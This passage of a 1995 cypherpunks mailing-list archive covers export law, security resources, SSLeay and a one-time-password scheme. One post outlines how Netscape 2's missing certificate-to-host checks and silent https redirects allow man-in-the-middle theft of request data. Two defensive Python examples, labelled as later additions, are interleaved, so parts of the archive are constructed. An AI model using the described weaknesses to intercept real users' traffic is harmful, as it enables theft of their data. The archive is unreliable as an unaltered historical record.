that I know of. if anyone does know of this kind of "security spectrum",
I think our cause of trying to improve software security would be
furthered immensely if whenever reporters call about bugs, the scale
factor could be consistently and uniformly used in association with 
trying to describe the severity of the bug.

I am willing to work on a beta version of this "security spectrum"
if there is sufficient interest. it certainly seems like a far better and 
worthwhile investment of time than, say, "the geek code", the latter of which
is already highly developed!! I don't really consider myself the best 
qualified in terms of experience but sometimes if you want something done, you
have to do it yourself.

however, if we do this, I hope that a good scale that is pretty general
and doesn't need extensions can be done from the start, before its widespread
usage, so that later changes do not confuse users. there is already 
confusion in the media about two slightly different richter scales, this
is a pity. 

another neat perq: if the cypherpunks come up with a good scale, it
could be a tremendous positive publicity tool. "today experts discovered
a bug in -x- that rated a -y- on the CSSS (Cypherpunk Security Spectrum Scale)"

generally, regarding cypherpunk priorities, I think the "media can be made 
our friend", but we just have to learn how to be more meticulous and 
careful in our interactions with them. in general I don't really think
a lot of the misreporting going on is the fault of the reporters involved.
it's not surprising they get their stories mixed up, when, IMHO, even
the "experts" they quote aren't particularly polished and don't really have 
their act fully together (or at least, tend to misrepresent the problems
from the beginning).

(most of the last Markoff article imho can just be chalked up to, "two 
prestigious graduate students who discovered something significant recently 
wrote a message warning about another significant security problem."  it shows
how absolutely critical it is to be careful what you say once you have
built up a bit of a reputation.  these two grad students are now being
watched as the Chicken Littles of Cyberspace by the media, unfairly
or not. be careful about wishing about fame, or anything else!! you might
get it!! makes me a bit nervous about causes *I* have promoted in the 
distant past.)

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 13 Oct 95 08:47:42 PDT
To: cypherpunks@toad.com
Subject: NNTP holes paper updated thatnks to Rich Salz
Message-ID: <9510131545.AA27613@all.net>
MIME-Version: 1.0
Content-Type: text


	Rich Salz read over the NNTP paper and helped greatly to
improve it.  The new version is now on-line.

	Thank you Rich.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Fri, 13 Oct 95 08:48:07 PDT
To: cypherpunks@toad.com
Subject: Re: Insecurity Section of the Internet Handbook
In-Reply-To: <199510131209.NAA20556@utopia.hacktic.nl>
Message-ID: <199510131547.LAA23036@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com writes:
 > For zoetrope, and others curious about the Insecurity
 > section of the Internet Handbook, we pass along this
 > Yellow Pages advert-insert comp sec teaser from
 > SAIC -- with only dribbles of cryptography. The puffery
 > appears to be artfully fattened and out-of-date. Like most
 > security porkers, SAIC sells its nitrated sec services
 > dearly (security by deep pockets of the fearful engorgers)
 > while feigning Net public-spirit to mask IP search and
 > steal. In a telling slight, SAIC does not cite outturned-
 > pockets, beef jerky Cypherpunks.

Anonymous remailers are great, but I'm not sure how much good they do
if you have (or, I suppose, you are a brilliant imitator of) the
unmistakeable writing style of John Young.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 13 Oct 95 08:57:42 PDT
To: Cypherpunks <froomkin@law.miami.edu>
Subject: Who is liable under ITAR (was Re: Anguilla Cypherpunks Meeting)
In-Reply-To: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
Message-ID: <m0t3mVR-0004MhC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: On Thu, 12 Oct 1995, Vincent Cate wrote:
: [..] 
: 
: > If while you are outside the USA you want to write some software that uses
: > encryption and sell it worldwide, let me know.  I could put you up while
: > you wrote it and my company could sell it for share of the selling price. 
: > Let me know what you are thinking of and how long you think it would take. 
: 
: Of course if you are a US person (citizen or green card holder) this is 
: just as much a violation of the ITAR as if you did it from inside the US...

And of course if you are not a US person this is just as much a
violation of the ITAR as if you were a US person.  The ITAR does not
exempt foreign persons from its requirements, though it does make them
ineligible to get a license permitting them to disclose their software
to other foreigners (or even to themselves).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 13 Oct 95 12:50:45 PDT
To: cypherpunks@toad.com
Subject: Same ol' massive MITM exposure in Netscape 2.01b
Message-ID: <Pine.SOL.3.91.951013122654.26464D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Just to repeat old news: Netscape 2 has similar  exposure to MITM attacks 
to 1.1. 

Netscape 2 does make one variant of the MITM attack less useful: The 
new document  info page allows information to be obtained about inlined 
images as well as the base page; this breaks the old attack of only 
intercepting inline image requests (which can be used to steal 
information in request headers without there being any chance of your 
certificate showing up). 


1) The client does not do any verification that the certificate used for 
the transaction is one associated with the server, allowing MITM 
substitutions as long as the server has a properly signed certificate

2) The client does not issue warnings for redirections from one https 
page to another https page, even if the url to which it is redirected has 
a different hostname to the url originally dereferenced.

3) In the case of redirection, the document info screen does not provide 
information about the originally referenced page, just the final page. 
This allows the MITM to intercept the first request, steal the request 
data, then issue a redirect to hide the certificate used in the intercept. 

4) In the beta version, the document info page does not display the 
security info (I did check with  MITM disabled). 


Simon

-----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))
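
The checks whose absence items 1 to 3 above describe, as an added example that is not Netscape's code or the poster's: match the certificate's names against the host in the URL at every hop, and report https redirects that change hostname, instead of inspecting only the final page. The certificate dicts follow the shape returned by Python's `ssl.SSLSocket.getpeercert()`; the hostnames, function names and finding labels are constructed.

```python
from urllib.parse import urlsplit


def cert_dns_names(cert: dict) -> list:
    """DNS names from a dict shaped like ssl.SSLSocket.getpeercert() output."""
    names = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not names:
        # Older certificates carry the host name only in the subject CN.
        for rdn in cert.get("subject", ()):
            names += [v for k, v in rdn if k == "commonName"]
    return [n.lower() for n in names]


def name_matches(pattern: str, host: str) -> bool:
    """Exact match, or one left-most '*' label standing for exactly one label."""
    p_labels = pattern.lower().split(".")
    h_labels = host.lower().split(".")
    if len(p_labels) != len(h_labels):
        return False
    if p_labels[0] == "*" and len(p_labels) > 2:
        return p_labels[1:] == h_labels[1:]
    return p_labels == h_labels


def cert_matches_host(cert: dict, host: str) -> bool:
    return any(name_matches(n, host) for n in cert_dns_names(cert))


def audit_chain(hops: list) -> list:
    """hops: (url, presented_cert) pairs in the order the client followed them."""
    findings = []
    prev_host = None
    for url, cert in hops:
        host = urlsplit(url).hostname
        if not cert_matches_host(cert, host):
            findings.append(("cert-host-mismatch", host))
        if prev_host is not None and host != prev_host:
            findings.append(("cross-host-redirect", f"{prev_host} -> {host}"))
        prev_host = host
    return findings


def final_page_only(hops: list) -> list:
    """The behaviour the post describes: only the last page is inspected."""
    url, cert = hops[-1]
    host = urlsplit(url).hostname
    return [] if cert_matches_host(cert, host) else [("cert-host-mismatch", host)]


def demo():
    # Constructed chain: the first request is answered with a validly signed
    # certificate issued for a different host, then redirected elsewhere.
    hops = [
        ("https://shop.example/order",
         {"subjectAltName": (("DNS", "other.example"),)}),
        ("https://pay.example/done",
         {"subjectAltName": (("DNS", "pay.example"),)}),
    ]
    return audit_chain(hops), final_page_only(hops)


if __name__ == "__main__":
    print(demo())
```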





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L.Detweiler" <ldetweil@csn.net>
Date: Fri, 13 Oct 95 12:05:36 PDT
To: cypherpunks@toad.com
Subject: CYPHERPUNKS EXPOSED
Message-ID: <199510131905.NAA00772@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain



Attn Reporters and Writers!! 

who are the CYPHERPUNKS?
what are they talking about?
what have they done in the past?
who are the "leaders"?
what do they believe in? 
what are their *real* goals?

My name is L.Detweiler, and I've made a serious study of the more ulterior 
aspects of the CYPHERPUNKS for several years, and I invite you to peruse my
findings at the web site below.

I've been quoted in various articles and I'm available for serious interviews
with anyone who wants the REAL STORY BEHIND THE CYPHERPUNKS.

note: be forewarned that key cypherpunks consider me a heretical 
blasphemer because of the tenacious, unforgiving honesty and 
zealous antisycophancy by which I have pursued this herculean study.


|   /\  |\| /~ L~            ``I have to spew this stuff, or I'd be on the
L_ /~~\ | | \_ L_             roof with a high power weapon.'' -Jim Carrey
http://www.csn.net/~ldetweil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 13 Oct 95 05:09:56 PDT
To: cypherpunks@toad.com
Subject: Insecurity Section of the Internet Handbook
Message-ID: <199510131209.NAA20556@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



For zoetrope, and others curious about the Insecurity
section of the Internet Handbook, we pass along this
Yellow Pages advert-insert comp sec teaser from
SAIC -- with only dribbles of cryptography. The puffery
appears to be artfully fattened and out-of-date. Like most
security porkers, SAIC sells its nitrated sec services
dearly (security by deep pockets of the fearful engorgers)
while feigning Net public-spirit to mask IP search and
steal. In a telling slight, SAIC does not cite outturned-
pockets, beef jerky Cypherpunks.

_______________________________________________________

URL: http://mls.saic.com/library.html [which links to the
listed contents]
   
                   SECURITY LIBRARY
           
The SAIC Security Library contains security-related 
information and programs from around the Net. SAIC does
not verify or endorse such files or any use thereof.
   
Notices and Upcoming Events [Not included here]

Advisories and Alerts

Newsgroups

Documents

Programs

Other Security Sites

_______________________________________________________

URL: http://mls.saic.com/alerts.html
 
            SECURITY ADVISORIES AND ALERTS
                                       
Alerts

   *  Sun Security Alerts
   *  CERT - Computer Emergency Response Team
   *  ASSIST - Automated Systems Security Incident
      Support Team
   *  AUSERT - Australian Security Emergency Response
      Team
   *  NASIRC - NASA Automated Systems Incident Response
      Capability
   *  DDN - Defense Data Network
   *  FIRST - Forum of Incident Response and Security
      Teams
       
Advisories

   *  8lgm Advisories
   *  Bugtraq Archives, threaded
   *  CERT Advisories
   *  CIAC - Computer Incident Advisory Capability 
     
_______________________________________________________

URL: http://mls.saic.com/docs.html
  
                  SECURITY DOCUMENTS

These documents are from the Net and cover a wide area of
topics concerning computer security. They are for the
education and legitimate use of computer security
techniques only. All non-FAQ documents are in PostScript
format unless otherwise noted.
     
______________________________________________________
   
Frequently Asked Questions

   *  Basic Computer Security
   *  Firewalls
   *  Setting Up Anonymous FTP
   *  What To Do If Your Machine Is Compromised
   *  Security Patches
   *  Vendor Contacts
   *  Pretty Good Privacy (PGP)
   *  #hack FAQ
   *  Cryptography FAQ 
     
_______________________________________________________

Firewalls

   Introductory Papers

   *  Internet Firewalls - An Introduction (August 1994,
      221K)
   *  Keeping Your Site Comfortably Secure: An
      Introduction to Internet Firewalls (Undated, 1.8M)
   
   General Firewall Documents

   *  A Network Firewall (June 1992, 374K)
   *  A Toolkit and Methods for Internet Firewalls
      (Undated, 185K)
   *  Proper Care and Feeding of Firewalls (November
      1994, 121K)
   *  A Network Perimeter with Secure External Access
      (Undated, 268K)
   *  An Internet Gatekeeper (Undated, 149K)
   *  Thinking About Firewalls (Undated, 109K)
   *  X Through Firewalls, and Other Application Relays
      (May 1993, 430K)
       
_______________________________________________________

   
WWW Security

   *  Security and the World Wide Web (June 1994, 10K
      HTML)
   *  NCSA on Mosaic Security Issues (December 1994, 1.6K
      HTML)
   *  Shen: A Security Scheme for the Web (Undated, 1.7K
      HTML)
   *  Using PGP/PEM Encryption (Undated, 7.6K HTML)
   *  Secure HTTP (Undated, 2.2K HTML)
   
_______________________________________________________

Intrusion Detection

   *  A Software Architecture to support Misuse
      Intrusion Detection (March 1995, 250K)
   *  An Application of Pattern Matching in Intrusion
      Detection (June 1994, 674K)
   *  Algorithm for Distributed Recognition and
      Accountability (Undated, 209K)
   *  A Pattern Matching Model for Misuse Intrusion
      Detection (Undated, 191K)
   *  AI Approach to Intrusion Detection (June 1994,
      168K)
   *  Intrusion Detection In Computers (January 1991,
      12K text)
   *  USTAT - A Real-time Intrusion Detection System for
      UNIX (November 1992, 1.3M)
     
_______________________________________________________

Improving your UNIX Security

   Technical Tips

   *  Setting up Sun Security (March 1992, 7K text)
   *  Miscellaneous Security Tips (October 1992, 23K
      text)
   *  CERT Generic Security Tips (July 1992, 17K text)
   *  UNIX Site Security Handbook (July 1991, 253K text)
   
Finding and Fixing Your Security Problems

   *  Improving the Security Of Your Site By Breaking
      Into It (Undated, 51K text)
   *  Finding Holes in Your System (October 1993, 16K
      text)
   *  Improving the Security of Your UNIX System (April
      1990, 274K)
   *  Becoming An Uebercracker to Stop Uebercrackers
      (December 1993, 9K text)

_______________________________________________________

The Internet Worm

   *  A Report on the Internet Worm (November 1988, 16K
      text)
   *  Technical Report on the Internet Worm Incident
      (September 1991, 173K)
   *  The Internet Worm Program: An Analysis (December
      1988, 283K)
   *  A Tour of the Worm (Undated, 166K)

_______________________________________________________

Tales of Computer Attacks and Countermeasures

   *  Five Incidents At Columbia University (Undated,
      93K)
   *  "An Evening With Berferd" (Undated, 82K)
   *  Internet Attack on Texas A&M (1993, 294K)
   *  "There Be Dragons" (August 1992, 185K)
   *  Computer Break-ins: A Case Study (Undated, 94K)
   *  System Admin Horror Stories (1992, 148K text)
     
_______________________________________________________
   
Networking

   TCP/IP Security

   *  TCP Wrapper Security (Undated, 59K)
   *  A Weakness in the 4.2BSD TCP/IP Software (February
      1985, 27K)
   *  Security Problems in the TCP/IP Protocol Suite
      (April 1989, 107K)
   *  Network (In)Security Through IP Packet Filtering
      (September 1992, 123K)   
   
   General Networking Documents

   *  Architecture and Implementation of Network-Layer
      Security under UNIX (Undated, 124K)
   *  Information Security And Privacy In Networks
      (Undated, 809K .tar file)
   *  Paving the Road to Network Security (May 1994,
      162K)
   *  NFS Tracing By Passive Network Monitoring
      (Undated, 170K)
   *  Addressing Weaknesses in the DNS Protocol (August
      1993, 406K)
   *  Countering Abuse of Name-Based Authentication
      (Undated, 243K)
   *  An Architectural Overview of UNIX Network Security
      (May 1993, 50K text)
   *  NIS Security Warning (December 1991, 7.5K)

_______________________________________________________

Trusted Systems

   *  The Orange Book (August 1983, 264K text)
   *  Understanding Configuration Management in Trusted
      Systems (March 1988, 138K text)
   *  Understanding DAC in Trusted Systems (September
      1987, 87K text)
   *  Understanding Facility Management in Trusted
      Systems (June 1989, 106K text)
   *  Understanding Trusted Distribution in Trusted
      Systems (December 1988, 55K text)
   *  Understanding Audit in Trusted Systems (July 1987,
      56K text)

_______________________________________________________

Newsletters

   *  COAST Newsletter
   *  Privacy Forum
   *  Cipher - Electronic Newsletter of the IEEE
      Technical Committee on Security and Privacy

_______________________________________________________

Miscellaneous Documents

   *  Security Term Glossary (Undated, 70K text)
   *  Open Systems Security - An Architectural Framework
      (June 1991, 300K text)
   *  Password Security: A Case History (Undated, 36K)
   *  Extracts from various security articles (Undated,
      61K text)
   *  Coping with the Threat of Computer Security
      Incidents (June 1990, 102K text)
   *  Threat Assessment of Malicious Code and Human
      Threats (October 1992, 231K)
   *  Tty Security - a Tty Session Manager (Undated,
      98K)
   *  Electromagnetic Emanation Eavesdropping (1989, 45K
      text)
   *  GAO Report on Internet Security (June 1989, 104K
      text)
   *  ACM SIG on Security, Audit, and Control
_______________________________________________________

URL: http://mls.saic.com/programs.html
   
                   SECURITY PROGRAMS

These programs are from various locations around the Net;
SAIC does not verify their functionality and/or
consequences of use. All programs are for assumed legal
uses and education. Unless noted, all programs are
intended for UNIX platforms.

Local (load directly to disk; gzip tar files unless
noted)

   *  COPS - Bulletproof your system from intruders
   *  Crack - Password cracker
   *  Cryptography File System (CFS) - Encrypted
      filesystems for SunOS
   *  Internet Security Scanner (ISS) - Checks UNIX
      sites for vulnerabilities
   *  ifstatus - Checks interfaces for promiscuous mode
   *  probe_ports - Finds open ports on UNIX systems
   *  Secure-Sun Check - Shell script to check several
      common SunOS vulnerabilities (no compression)

Remote

   *  Arpwatch - Ethernet monitor, keeps track of
      ethernet/IP address pairings
   *  Chalance - Intercept-proof password authentication
   *  chrootuid - Run network programs in a minimal
      environment
   *  CBW - Code Breaker's Workbench
   *  Courtney - Identifies the use of SATAN
   *  Dig - Sends domain name query packets to name
      servers
   *  DNSWalk
   *  Drawbridge - A bridging filter from TAMU
   *  Kerberos - Provides secure networking
   *  MegaPatch - Large number of SunOS patches in one
      bundle
   *  Netlog - TCP/UDP traffic logging system
   *  PGP - Pretty Good Privacy
   *  Portmap - Portmapper replacement, with access
      control
   *  SATAN - Checks computers/networks for security
      vulnerabilities
   *  Securelib - Protects RPC daemons
   *  screend - Filters IP packets
   *  Smrsh - Sendmail restricted shell
   *  Socks - Allows Internet access to firewalled
      machines
   *  SRA - Secure RPC Authentication for Telnet and FTP
   *  TAMU - Texas A&M Security Tool Package
   *  tcpdump - captures protocol packets from networks
   *  TCP Wrapper - ACLs for network services
   *  Tiger - Scans your UNIX system for security
      problems
   *  TIS Firewall Toolkit - Firewall package from TIS
   *  Tripwire - Watch for system file changes
   *  Watcher - Watches your system for security
      problems
 
_______________________________________________________

URL: http://mls.saic.com/sites.html
   
                 OTHER SECURITY SITES

Cryptography

   *  International Assoc. for Cryptologic Research
   *  Cryptography Web Page at UMBC
   *  Cryptography Export Control Archives
   *  Lawrie's Cryptography Bibliography
   *  RSA Data Security, Inc.
   *  Quadralay's Cryptography Archive
   *  Cryptography, PGP, and Your Privacy
   *  PGP Web Page
 
Firewall Vendors and Information

   *  Harris Computer Systems
   *  Sun Microsystems (SunScreen)
   *  Trusted Information Systems
   *  Cohesive Systems
   *  Sea Change Corp.
   *  Raptor Systems
   *  Greatcircle Firewall Server
   *  Virtual-One Network Environment Corp (V-ONE)
   *  CheckPoint Software Technologies Ltd.
   *  Firewalls.R.Us
 
Security Gophers

   *  InterNIC's Computer and Network Security
   *  NIST Security
   *  Security, Audit & Control (SIGSAC)

World Wide Web Security

   *  WWW Security Mailing List Archive
   *  WWW Security at Rutgers University
 
Intrusion Detection

   *  Intrusion Detection Systems Archives (threaded)
 
PC Security

   *  Safetynet, Inc.
 
Various Security Sites

   *  Computer Security Research Lab at UC Davis
   *  Computer Security at chalmers.se
   *  Harris Computer Systems
   *  Szymon Sokol's Security Site
   *  The Uebercracker's Web Site
   *  COAST Project and Laboratory
   *  Computer Underground Digest Archive
   *  Security News Clippings Archive
   *  EINet's Computer Virus and Security Page
   *  Crimelab
   *  Phrack Magazine Home Page
   *  TANSU's Security Reference Index
   *  Digital Equipment's Secure Systems Index
   *  Bellcore Security Products
   *  Texas A&M security tools
   *  ftp.win.tue.nl
   *  NIST Computer Security Resource Clearinghouse
   *  Christopher Menegay's Security Page
   *  Security Papers at Johns Hopkins University
   *  Dartmouth Security Tools
   *  CERT FTP Archive
   *  Computer Systems Consulting
   *  Computer Systems Consulting (Local Files)
   *  MIT's Athena Project
   *  Yahoo's Security and Encryption Page
   *  NIST Computer Security
   *  ALW Unix Security Information
   *  ALW's List of Unix Security Programs
   *  ESNet FTP site
   *  Bennet Yee's Security Page
   *  Various security FTP pointers

_______________________________________________________
   
Send questions and comments to Webmaster@mls.saic.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 13 Oct 95 10:23:38 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.951013132130.480D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995 s1018954@aix2.uottawa.ca wrote:
> What if you were a dual citizen (US/Canada in my case)?
> 
Get competent legal advice.  I.e. don't ask me.  As a general rule, I 
know of two principles that might be relevant here: 1) US and Canada 
rules on export control tend to be very similar; 2) lots of US rules 
apply to US persons abroad, not just income tax.  See, e.g., the Trading 
With the Enemy Act.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 13 Oct 95 10:35:55 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131128.A6667-0100000@offshore.com.ai>
Message-ID: <Pine.SUN.3.91.951013132317.480E-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Vincent Cate wrote:

For your personal situation you *must* get competent legal advice.  
I.E. pay someone who makes it a point to stay more current in this stuff 
than I do.  I recommend Lee Tien, for example, or Ken Bass.  I bet Lee is 
less expensive :>.  This note is NOT legal advice, and may not be 
competent since it is research-free.  It would not be wise to make any 
important decisions on the basis of this note.

As a general matter, however, if you are a US person and give crypto to a 
foreign person (be it a real person or a corporation), then as a 
technical legal matter you are in violation of the ITAR. 

US law doesn't ordinarily cover non-us corporations abroad (but see some
anti-trust and money laundering rules), but the ITAR will cover any US
person (ie citizen or green card holder) who works for them or transacts
with them. 

Off the top of my head, I don't know whether the acquisition of totally
foreign-created crypto by a foreign corporation managed, owned or
controlled by a US person becomes an ITAR-controlled "export" when that 
crypto is sold to a non-us person.  I would, however, want a good legal 
opinion before I exposed myself to the risk as I could sure make a good 
argument that the ITAR reached that far.  All of this is without 
prejudice to the issue of whether the ITAR are constitutional...

As for the specific fact situation you describe below, which I understand
to be a little different from the one described above, I'm afraid you
would have to discuss this in some detail with a lawyer; I'm sorry I can't
be more help. 

> 
> On Fri, 13 Oct 1995, Michael Froomkin wrote:
> > On Thu, 12 Oct 1995, Vincent Cate wrote:
> > > If while you are outside the USA you want to write some software that uses
> > > encryption and sell it worldwide, let me know.  I could put you up while
> > > you wrote it and my company could sell it for share of the selling price. 
> > > Let me know what you are thinking of and how long you think it would take. 
> > 
> > Of course if you are a US person (citizen or green card holder) this is 
> > just as much a violation of the ITAR than if you did it from inside the US...
> 
> Yes, I am still a US citizen, so far. 
> 
> The corporation I work for is a legal entity of Anguilla.  I would not
> personally be selling it, the corporation would.  Do you think that is ok? 
> 
> What if I had a couple Anguillian friends form a corporation for this
> purpose (buying encryption software written in Anguilla and selling it
> internationally)?  No trouble yet, right?  What if the people who come and
> write it are US citizens?  
> 
> I don't see how US law can cover corporations in other countries.
> 
> PS - it is good to CC me (as you did) as I only get cypherpunks-lite, and
> so may not see a message, or it may be delayed. 
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 13 Oct 95 05:50:42 PDT
To: cypherpunks@toad.com
Subject: OneTimePasswd (not Pad)
Message-ID: <9510131250.AA28930@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



Hello,
I'm about to implement an OTPasswd (mostly like s/key) scheme in my
www browsers/clients/proxy, but I was wondering whether the mere principle
of storing H^n(S) and requesting H^(n-1) from the peer (H being your
favorite strong one-way hash function (MD5), and S your seed+secret
passwd) could possibly be patented somehow, thus preventing use of a
similar scheme without getting a license (from
bellcore?),.... are there any usage conditions/restrictions?,... 

Also, can one compute the amount of information (if any) leaked by the
method, i.e., would an attacker who had all the
H^i  i={a...b}  (by snooping for instance) have his job eased,
and by 'how much', in finding S (or H^(a-1))? Are there any studies on
that for H=MD[45]? (And what is the status of free use of MDx, btw?)

ps: I just had a thought that maybe the last P in elementrix POTP would
be Passwd and not Pad... it could still be quite interesting to have
H^n(S) (maybe a variant with large n) used as 'secret' keys between
parties; you'd get lots of pluses against standard attacks, provided
that there is no problem with knowing the function H^n for several
(possibly large) n... hmmm, why hasn't this been implemented? What
obvious flaw am I missing?


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Soviet NORAD SDI $400 million in gold South Africa plutonium KGB
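
The store-H^n(S), request-H^(n-1)(S) exchange asked about in the message above, as an added example that is not part of the original post: a small hash-chain verifier and responder. SHA-256 stands in for the MD5 named in the message, and the names chain, Verifier, respond and demo, along with the sample seed and secret, are constructed for illustration.

```python
import hashlib
import hmac


def chain(seed: bytes, secret: bytes, n: int) -> bytes:
    """Return H^n(S), where S = seed || secret and H is SHA-256."""
    if n < 0:
        raise ValueError("n must be non-negative")
    value = seed + secret
    for _ in range(n):
        value = hashlib.sha256(value).digest()
    return value


class Verifier:
    """Server side: holds only the last accepted chain value and its index."""

    def __init__(self, seed: bytes, top: bytes, n: int):
        self.seed = seed
        self.stored = top   # H^n(S) at enrolment; the secret is never stored
        self.index = n      # index of the value currently stored

    def challenge(self):
        """Seed and index the client must answer with."""
        # H^0(S) would be the raw secret, so stop once H^1(S) has been used.
        if self.index <= 1:
            raise RuntimeError("chain exhausted; enrol a new seed")
        return self.seed, self.index - 1

    def verify(self, response: bytes) -> bool:
        """Accept iff H(response) equals the stored value, then step down."""
        if self.index <= 1:
            return False
        candidate = hashlib.sha256(response).digest()
        if not hmac.compare_digest(candidate, self.stored):
            return False    # state is left untouched on failure
        self.stored = response
        self.index -= 1
        return True


def respond(secret: bytes, challenge) -> bytes:
    """Client side: recompute H^index(S) from the memorised secret."""
    seed, index = challenge
    return chain(seed, secret, index)


def demo() -> dict:
    # Constructed sample values, not taken from the mailing-list message.
    seed, secret, n = b"ke4321", b"constructed passphrase", 4
    server = Verifier(seed, chain(seed, secret, n), n)

    snooped, results = [], []
    for _ in range(2):                      # two logins observed on the wire
        otp = respond(secret, server.challenge())
        results.append(server.verify(otp))
        snooped.append(otp)                 # H^3(S), then H^2(S)

    # Replaying the most recent password fails: the server now expects a
    # preimage of it, not the value itself.
    replay_accepted = server.verify(snooped[-1])

    # Every older observed value is H applied to the newest one, so the whole
    # snooped set is recomputable from its lowest-index member.
    older_derivable = hashlib.sha256(snooped[-1]).digest() == snooped[0]

    results.append(server.verify(respond(secret, server.challenge())))  # H^1(S)
    try:
        server.challenge()
        exhausted = False
    except RuntimeError:
        exhausted = True

    return {
        "logins_ok": all(results),
        "replay_accepted": replay_accepted,
        "older_derivable": older_derivable,
        "exhausted": exhausted,
    }


if __name__ == "__main__":
    print(demo())
```

The older_derivable check shows that the observed values H^a..H^b are all computable from H^a alone, so what protects the next password is the preimage resistance of H at the lowest observed index.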




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 13 Oct 95 06:53:04 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: IDEA algorithm
In-Reply-To: <199510130250.WAA08368@homeport.org>
Message-ID: <Pine.SOL.3.91.951013135056.2444A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Adam Shostack wrote:
> | (Btw... what would be the absolute coolest thing folk would like to see
> | added to RSAREF? That is, other than code that we will need to negotiate
> | for. What new thing, speed upgrade, enhancement, etc would just tickle?)
...
> 	Another really big win would be to add more entry points to
> the code to legitimize Wei Dai's excellent Crypto++ library, which has
> to jump in at all sorts of unpublished interfaces.

How about just making all the interfaces at the different levels 
available.  The next version of SSLeay (when I get it and the 
documentation finished) will have defined interfaces at the following 
levels for the various ciphers etc.

The actual cipher level
	eg des_set_key, des_cfb_encrypt, idea_cbc_encrypt...
	This level is wanted by things like SSL for the fastest on the fly
	encryption possible.

The 'by parts' routines
	eg EncryptBegin, EncryptUpdate, EncryptFinish (which take a CIPHER 
	pointer as an argument).
	This is sort of wanted by people implementing higher level digital 
	signature routines but they are useful in their own right.

The 'digital' envelope routines.
	eg SealBegin, SealUpdate, SealFinish (which take a CIPHER pointer, a
	MD pointer and the public keys etc.)
	The high level stuff for PKCS-7/S-MIME/PEM etc.

I am also documenting the interface to the big number library (anyone 
want to do DSS :-).
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 13 Oct 95 14:55:40 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <v02120d13aca49c9c9e70@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>why is the cp meeting sponsored by sun?
>so we can hear a sales pitch on java?

Actually, the idea for the meeting came out of a discussion
at a party that Marianne and I attended last summer. Chip
Morningstar (one of the co-founders of Electric Communities)
and I were getting heavily into Java; also, my wife and I
were starting to write a crypto package for Java (JCrypt).

Subsequently, at a focus group meeting at Sun, we discovered
that practically all of us were on cypherpunks.

It's just a happy accident that discussion about Java has hit
a crescendo here on the list. I suggested to mrm that we have
it at Sun, since the warehouse loft space in SF where we've
been meeting, charming as it is, isn't a great spot for doing
presentations and would likely have capacity problems for this
topic.

So no, this is not some great conspiracy on Sun's part to
